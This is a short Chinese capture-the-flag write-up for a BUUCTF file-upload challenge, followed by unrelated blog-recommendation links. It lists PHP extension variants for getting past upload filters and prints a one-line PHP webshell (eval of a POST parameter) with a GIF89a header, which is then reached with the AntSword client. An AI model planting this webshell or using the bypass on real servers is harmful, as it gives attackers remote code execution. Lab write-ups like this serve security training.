buuctf web [ACTF2020 新生赛]Upload

明了但不明显的文件上传

传个试试

行,抓包吧,php格式不行,就先上传要求的格式:jpg、png、gif

抓到上传的包之后,再修改成我们想要的

常见的php格式绕过有:php,php3,php4,php5,phtml,pht

挨个试试

这是上个图片题上传的木马,没有改格式,让上传图片,最好加上(GIF89a)

一句话木马:GIF89a

<script language="php">eval($_POST['cmd']);</script>

上传成功,它也把保存的路径告诉你了

掏出蚁剑大宝贝梭哈就完了

flag

相关推荐
dualven_in_csdn1 小时前
搞了两天的win7批处理脚本问题
java·linux·前端
你的人类朋友2 小时前
✍️【Node.js程序员】的数据库【索引优化】指南
前端·javascript·后端
小超爱编程3 小时前
纯前端做图片压缩
开发语言·前端·javascript
应巅3 小时前
echarts 数据大屏(无UI设计 极简洁版)
前端·ui·echarts
Jimmy4 小时前
CSS 实现描边文字效果
前端·css·html
islandzzzz4 小时前
HMTL+CSS+JS-新手小白循序渐进案例入门
前端·javascript·css·html
Senar4 小时前
网页中如何判断用户是否处于闲置状态
前端·javascript
很甜的西瓜4 小时前
typescript软渲染实现类似canvas的2d矢量图形引擎
前端·javascript·typescript·图形渲染·canvas
Allen Bright5 小时前
【CSS-9】深入理解CSS字体图标:原理、优势与最佳实践
前端·css
阿芯爱编程5 小时前
最长和谐子序列,滑动窗口
前端·javascript·面试